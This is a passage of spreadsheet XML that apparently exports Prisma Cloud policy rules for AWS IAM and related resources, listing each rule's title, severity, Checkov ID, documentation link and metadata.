      <c r="K1057" t="inlineStr">
        <is>
          <t>IAM Policy Document Allows All or Any AWS Principal Permissions to Resources</t>
        </is>
      </c>
      <c r="L1057" t="inlineStr"/>
      <c r="M1057" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1057" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1057" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1057" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1057" t="inlineStr"/>
      <c r="R1057" t="inlineStr"/>
      <c r="S1057" t="inlineStr"/>
      <c r="T1057" t="b">
        <v>0</v>
      </c>
      <c r="U1057" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1057" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-policy-document</t>
        </is>
      </c>
      <c r="W1057" t="inlineStr">
        <is>
          <t>Ensure no IAM policies documents allow ALL or any AWS principal permissions to the resource</t>
        </is>
      </c>
      <c r="X1057" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-283</t>
        </is>
      </c>
      <c r="Y1057" t="inlineStr"/>
      <c r="Z1057" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_policy_document"]}</t>
        </is>
      </c>
      <c r="AA1057" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1057" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1057" t="inlineStr">
        <is>
          <t>CKV_AWS_283</t>
        </is>
      </c>
      <c r="AD1057" t="b">
        <v>1</v>
      </c>
      <c r="AE1057" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1057" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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7" t="inlineStr">
        <is>
          <t>03ced766-24f6-42c5-a1b2-5da797b74faf</t>
        </is>
      </c>
      <c r="AI1057" t="inlineStr"/>
      <c r="AJ1057" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1057" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" t="inlineStr">
        <is>
          <t>PCS SWAT Standards (SWATS) 1.0 - DO NOT TOUCH</t>
        </is>
      </c>
      <c r="B1058" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1058" s="2" t="inlineStr"/>
      <c r="D1058" t="inlineStr"/>
      <c r="E1058" t="inlineStr"/>
      <c r="F1058" t="inlineStr"/>
      <c r="G1058" t="b">
        <v>1</v>
      </c>
      <c r="H10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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1058" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1058" t="inlineStr">
        <is>
          <t>AWS IAM policy allows all principals used by any AWS service from target account to assume role</t>
        </is>
      </c>
      <c r="L1058" t="inlineStr"/>
      <c r="M1058" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1058" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1058" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1058" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1058" t="inlineStr">
        <is>
          <t>5.1 Config</t>
        </is>
      </c>
      <c r="R1058" t="inlineStr">
        <is>
          <t>5.1.1 Config - Other</t>
        </is>
      </c>
      <c r="S1058" t="inlineStr"/>
      <c r="T1058" t="b">
        <v>0</v>
      </c>
      <c r="U1058" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1058" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-role</t>
        </is>
      </c>
      <c r="W1058" t="inlineStr">
        <is>
          <t>Ensure IAM role allows only specific principals in account to assume it</t>
        </is>
      </c>
      <c r="X1058" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-iam-45</t>
        </is>
      </c>
      <c r="Y1058" t="inlineStr"/>
      <c r="Z1058" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_role"]}</t>
        </is>
      </c>
      <c r="AA1058" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1058" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1058" t="inlineStr">
        <is>
          <t>CKV_AWS_61</t>
        </is>
      </c>
      <c r="AD1058" t="b">
        <v>1</v>
      </c>
      <c r="AE1058" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1058" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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8" t="inlineStr">
        <is>
          <t>84214659-a01d-48d0-aee8-9b00ce51bfdd</t>
        </is>
      </c>
      <c r="AI1058" t="inlineStr"/>
      <c r="AJ1058" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1058" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" t="inlineStr"/>
      <c r="B1059" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1059" s="2" t="inlineStr"/>
      <c r="D1059" t="inlineStr"/>
      <c r="E1059" t="inlineStr"/>
      <c r="F1059" t="inlineStr"/>
      <c r="G1059" t="b">
        <v>1</v>
      </c>
      <c r="H10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59" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1059" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1059" t="inlineStr">
        <is>
          <t>AWS IAM role allows all services or principals to be assumed</t>
        </is>
      </c>
      <c r="L1059" t="inlineStr"/>
      <c r="M1059" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1059" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1059" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1059" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1059" t="inlineStr"/>
      <c r="R1059" t="inlineStr"/>
      <c r="S1059" t="inlineStr"/>
      <c r="T1059" t="b">
        <v>0</v>
      </c>
      <c r="U1059" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1059" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-role</t>
        </is>
      </c>
      <c r="W1059" t="inlineStr">
        <is>
          <t>Ensure IAM role allows only specific services or principals to assume it</t>
        </is>
      </c>
      <c r="X1059" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-iam-44</t>
        </is>
      </c>
      <c r="Y1059" t="inlineStr"/>
      <c r="Z1059" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_role"]}</t>
        </is>
      </c>
      <c r="AA1059" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1059" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1059" t="inlineStr">
        <is>
          <t>CKV_AWS_60</t>
        </is>
      </c>
      <c r="AD1059" t="b">
        <v>1</v>
      </c>
      <c r="AE1059" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1059" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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59" t="inlineStr">
        <is>
          <t>7242e0c2-e72f-4c4a-bd12-7f36d47f695c</t>
        </is>
      </c>
      <c r="AI1059" t="inlineStr"/>
      <c r="AJ1059" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1059" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" t="inlineStr"/>
      <c r="B1060" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1060" s="2" t="inlineStr"/>
      <c r="D1060" t="inlineStr"/>
      <c r="E1060" t="inlineStr"/>
      <c r="F1060" t="inlineStr"/>
      <c r="G1060" t="b">
        <v>1</v>
      </c>
      <c r="H10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0" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1060" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1060" t="inlineStr">
        <is>
          <t>AWS AdministratorAccess policy is used by IAM roles, users, or groups</t>
        </is>
      </c>
      <c r="L1060" t="inlineStr"/>
      <c r="M1060" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1060" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1060" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1060" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1060" t="inlineStr"/>
      <c r="R1060" t="inlineStr"/>
      <c r="S1060" t="inlineStr"/>
      <c r="T1060" t="b">
        <v>0</v>
      </c>
      <c r="U1060" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1060" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-role,aws-iam-policy-attachment,aws-iam-role-policy-attachment,aws-iam-user-policy-attachment,aws-iam-group-policy-attachment,aws-ssoadmin-managed-policy-attachment</t>
        </is>
      </c>
      <c r="W1060" t="inlineStr">
        <is>
          <t>Disallow IAM roles, users, and groups from using the AWS AdministratorAccess policy</t>
        </is>
      </c>
      <c r="X1060" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-274</t>
        </is>
      </c>
      <c r="Y1060" t="inlineStr"/>
      <c r="Z1060" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_role","aws_iam_policy_attachment","aws_iam_role_policy_attachment","aws_iam_user_policy_attachment","aws_iam_group_policy_attachment","aws_ssoadmin_managed_policy_attachment"]}</t>
        </is>
      </c>
      <c r="AA1060" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1060" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1060" t="inlineStr">
        <is>
          <t>CKV_AWS_274</t>
        </is>
      </c>
      <c r="AD1060" t="b">
        <v>1</v>
      </c>
      <c r="AE1060" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1060" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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0" t="inlineStr">
        <is>
          <t>371f33a3-412b-4a21-b53e-030b4b49cbc2</t>
        </is>
      </c>
      <c r="AI1060" t="inlineStr"/>
      <c r="AJ1060" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1060" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" t="inlineStr"/>
      <c r="B1061" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1061" s="2" t="inlineStr"/>
      <c r="D1061" t="inlineStr"/>
      <c r="E1061" t="inlineStr"/>
      <c r="F1061" t="inlineStr"/>
      <c r="G1061" t="b">
        <v>1</v>
      </c>
      <c r="H10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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1061" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1061" t="inlineStr">
        <is>
          <t>AWS IAM policy documents allow * (asterisk) as a statement's action</t>
        </is>
      </c>
      <c r="L1061" t="inlineStr"/>
      <c r="M1061" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1061" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1061" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1061" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1061" t="inlineStr"/>
      <c r="R1061" t="inlineStr"/>
      <c r="S1061" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="T1061" t="b">
        <v>0</v>
      </c>
      <c r="U1061" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1061" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-role-policy,aws-iam-user-policy,aws-iam-group-policy,aws-iam-policy</t>
        </is>
      </c>
      <c r="W1061" t="inlineStr">
        <is>
          <t>Ensure no IAM policies documents allow "*" as a statement's actions</t>
        </is>
      </c>
      <c r="X1061" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/iam-48</t>
        </is>
      </c>
      <c r="Y1061" t="inlineStr"/>
      <c r="Z1061" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_role_policy","aws_iam_user_policy","aws_iam_group_policy","aws_iam_policy"]}</t>
        </is>
      </c>
      <c r="AA1061" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1061" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1061" t="inlineStr">
        <is>
          <t>CKV_AWS_63</t>
        </is>
      </c>
      <c r="AD1061" t="b">
        <v>1</v>
      </c>
      <c r="AE1061" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1061" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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1" t="inlineStr">
        <is>
          <t>43727ea1-1037-4398-be4a-f07e3eff716c</t>
        </is>
      </c>
      <c r="AI1061" t="inlineStr"/>
      <c r="AJ1061" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1061" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" t="inlineStr"/>
      <c r="B1062" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1062" s="2" t="inlineStr"/>
      <c r="D1062" t="inlineStr"/>
      <c r="E1062" t="inlineStr"/>
      <c r="F1062" t="inlineStr"/>
      <c r="G1062" t="b">
        <v>1</v>
      </c>
      <c r="H10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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1062" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1062" t="inlineStr">
        <is>
          <t>Access is not controlled through Single Sign-On (SSO)</t>
        </is>
      </c>
      <c r="L1062" t="inlineStr"/>
      <c r="M1062" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N1062" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1062" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1062" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1062" t="inlineStr"/>
      <c r="R1062" t="inlineStr"/>
      <c r="S1062" t="inlineStr"/>
      <c r="T1062" t="b">
        <v>0</v>
      </c>
      <c r="U1062" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1062" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-user</t>
        </is>
      </c>
      <c r="W1062" t="inlineStr">
        <is>
          <t>Ensure access is controlled through SSO and not AWS IAM defined users</t>
        </is>
      </c>
      <c r="X1062" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-273</t>
        </is>
      </c>
      <c r="Y1062" t="inlineStr"/>
      <c r="Z1062" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_user"]}</t>
        </is>
      </c>
      <c r="AA1062" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1062" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1062" t="inlineStr">
        <is>
          <t>CKV_AWS_273</t>
        </is>
      </c>
      <c r="AD1062" t="b">
        <v>1</v>
      </c>
      <c r="AE1062" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1062" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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2" t="inlineStr">
        <is>
          <t>a9550a9c-9a97-44e4-8358-0c90759621b4</t>
        </is>
      </c>
      <c r="AI1062" t="inlineStr"/>
      <c r="AJ1062" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1062" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" t="inlineStr"/>
      <c r="B1063" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1063" s="2" t="inlineStr"/>
      <c r="D1063" t="inlineStr"/>
      <c r="E1063" t="inlineStr"/>
      <c r="F1063" t="inlineStr"/>
      <c r="G1063" t="b">
        <v>1</v>
      </c>
      <c r="H10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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1063" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam</t>
        </is>
      </c>
      <c r="K1063" t="inlineStr">
        <is>
          <t>IAM User has access to the console</t>
        </is>
      </c>
      <c r="L1063" t="inlineStr"/>
      <c r="M1063" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1063" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1063" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1063" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1063" t="inlineStr"/>
      <c r="R1063" t="inlineStr"/>
      <c r="S1063" t="inlineStr"/>
      <c r="T1063" t="b">
        <v>0</v>
      </c>
      <c r="U1063" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1063" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-iam-user,aws-iam-user-login-profile</t>
        </is>
      </c>
      <c r="W1063" t="inlineStr">
        <is>
          <t>Ensure an IAM User does not have access to the console</t>
        </is>
      </c>
      <c r="X1063" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/ensure-an-iam-user-does-not-have-access-to-the-console-group</t>
        </is>
      </c>
      <c r="Y1063" t="inlineStr"/>
      <c r="Z1063" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_iam_user","aws_iam_user_login_profile"]}</t>
        </is>
      </c>
      <c r="AA1063" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1063" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1063" t="inlineStr">
        <is>
          <t>CKV2_AWS_22</t>
        </is>
      </c>
      <c r="AD1063" t="b">
        <v>1</v>
      </c>
      <c r="AE1063" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1063" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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3" t="inlineStr">
        <is>
          <t>a1a40ccc-c0d9-40dc-8bbe-a76d859cbff6</t>
        </is>
      </c>
      <c r="AI1063" t="inlineStr"/>
      <c r="AJ1063" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1063" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" t="inlineStr"/>
      <c r="B1064" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1064" s="2" t="inlineStr"/>
      <c r="D1064" t="inlineStr"/>
      <c r="E1064" t="inlineStr"/>
      <c r="F1064" t="inlineStr"/>
      <c r="G1064" t="b">
        <v>1</v>
      </c>
      <c r="H10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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1064" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-kms</t>
        </is>
      </c>
      <c r="K1064" t="inlineStr">
        <is>
          <t>A Policy is not Defined for KMS Key</t>
        </is>
      </c>
      <c r="L1064" t="inlineStr"/>
      <c r="M1064" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1064" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1064" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1064" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1064" t="inlineStr"/>
      <c r="R1064" t="inlineStr"/>
      <c r="S1064" t="inlineStr"/>
      <c r="T1064" t="b">
        <v>0</v>
      </c>
      <c r="U1064" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1064" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-kms-key</t>
        </is>
      </c>
      <c r="W1064" t="inlineStr">
        <is>
          <t>Ensure KMS key Policy is defined</t>
        </is>
      </c>
      <c r="X1064" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-2-64</t>
        </is>
      </c>
      <c r="Y1064" t="inlineStr"/>
      <c r="Z1064" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_kms_key"]}</t>
        </is>
      </c>
      <c r="AA1064" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1064" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1064" t="inlineStr">
        <is>
          <t>CKV2_AWS_64</t>
        </is>
      </c>
      <c r="AD1064" t="b">
        <v>1</v>
      </c>
      <c r="AE1064" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1064" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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4" t="inlineStr">
        <is>
          <t>23a308a5-49b3-4cb6-aab9-ef6b5e8b866f</t>
        </is>
      </c>
      <c r="AI1064" t="inlineStr"/>
      <c r="AJ1064" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1064" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" t="inlineStr"/>
      <c r="B1065" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1065" s="2" t="inlineStr"/>
      <c r="D1065" t="inlineStr"/>
      <c r="E1065" t="inlineStr"/>
      <c r="F1065" t="inlineStr"/>
      <c r="G1065" t="b">
        <v>1</v>
      </c>
      <c r="H10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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1065" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-lambda</t>
        </is>
      </c>
      <c r="K1065" t="inlineStr">
        <is>
          <t>Permissions delegated to AWS services for AWS Lambda functions are not limited by SourceArn or SourceAccount</t>
        </is>
      </c>
      <c r="L1065" t="inlineStr"/>
      <c r="M1065" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N1065" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1065" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1065" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1065" t="inlineStr"/>
      <c r="R1065" t="inlineStr"/>
      <c r="S1065" t="inlineStr"/>
      <c r="T1065" t="b">
        <v>0</v>
      </c>
      <c r="U1065" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1065" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-lambda-permission</t>
        </is>
      </c>
      <c r="W1065" t="inlineStr">
        <is>
          <t>Ensure that AWS Lambda function permissions delegated to AWS services are limited by SourceArn or SourceAccount</t>
        </is>
      </c>
      <c r="X1065" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-iam-policies/bc-aws-364</t>
        </is>
      </c>
      <c r="Y1065" t="inlineStr"/>
      <c r="Z1065" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_lambda_permission"]}</t>
        </is>
      </c>
      <c r="AA1065" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1065" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1065" t="inlineStr">
        <is>
          <t>CKV_AWS_364</t>
        </is>
      </c>
      <c r="AD1065" t="b">
        <v>1</v>
      </c>
      <c r="AE1065" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1065" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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5" t="inlineStr">
        <is>
          <t>75538f52-55ae-4326-8fda-bd36a80d9aa8</t>
        </is>
      </c>
      <c r="AI1065" t="inlineStr"/>
      <c r="AJ1065" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1065" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" t="inlineStr"/>
      <c r="B1066" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1066" s="2" t="inlineStr"/>
      <c r="D1066" t="inlineStr"/>
      <c r="E1066" t="inlineStr"/>
      <c r="F1066" t="inlineStr"/>
      <c r="G1066" t="b">
        <v>1</v>
      </c>
      <c r="H10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6" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J1066" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-sns</t>
        </is>
      </c>
      <c r="K1066" t="inlineStr">
        <is>
          <t>SNS topic policy is public and access is not restricted to specific services or principals</t>
        </is>
      </c>
      <c r="L1066" t="inlineStr"/>
      <c r="M1066" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N1066" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O1066" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P1066" t="inlineStr">
        <is>
          <t>build</t>
        </is>
      </c>
      <c r="Q1066" t="inlineStr"/>
      <c r="R1066" t="inlineStr"/>
      <c r="S1066" t="inlineStr"/>
      <c r="T1066" t="b">
        <v>0</v>
      </c>
      <c r="U1066" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V1066" t="inlineStr">
        <is>
          <t>IaC:IAM:aws-sns-topic-policy</t>
        </is>
      </c>
      <c r="W1066" t="inlineStr">
        <is>
          <t>Ensure SNS topic policy is not public by only allowing specific services or principals to access it</t>
        </is>
      </c>
      <c r="X1066" t="inlineStr">
        <is>
          <t>Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/aws-policies/aws-general-policies/ensure-sns-topic-policy-is-not-public-by-only-allowing-specific-services-or-principals-to-access-it</t>
        </is>
      </c>
      <c r="Y1066" t="inlineStr"/>
      <c r="Z1066" t="inlineStr">
        <is>
          <t>{"category":"IAM","resourceTypes":["aws_sns_topic_policy"]}</t>
        </is>
      </c>
      <c r="AA1066" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB1066" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC1066" t="inlineStr">
        <is>
          <t>CKV_AWS_169</t>
        </is>
      </c>
      <c r="AD1066" t="b">
        <v>1</v>
      </c>
      <c r="AE1066" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF1066" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG10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6" t="inlineStr">
        <is>
          <t>a8a9de0c-8ca3-43e1-bb3c-2e4fd6fe94f0</t>
        </is>
      </c>
      <c r="AI1066" t="inlineStr"/>
      <c r="AJ1066" t="inlineStr">
        <is>
          <t>false</t>
        </is>
      </c>
      <c r="AK1066" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" t="inlineStr"/>
      <c r="B1067" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C1067" s="2" t="inlineStr"/>
